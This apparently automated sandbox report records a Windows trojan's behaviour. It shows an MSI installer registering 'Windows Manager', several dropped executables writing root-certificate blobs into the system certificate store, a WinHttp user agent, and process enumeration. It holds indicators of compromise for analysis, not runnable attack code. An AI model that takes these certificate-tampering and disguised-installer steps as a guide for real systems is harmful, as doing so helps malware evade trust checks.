Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\ProgramData\2567193.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\678D.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\ProgramData\2567193.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\ProgramData\2567193.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\678D.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\678D.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
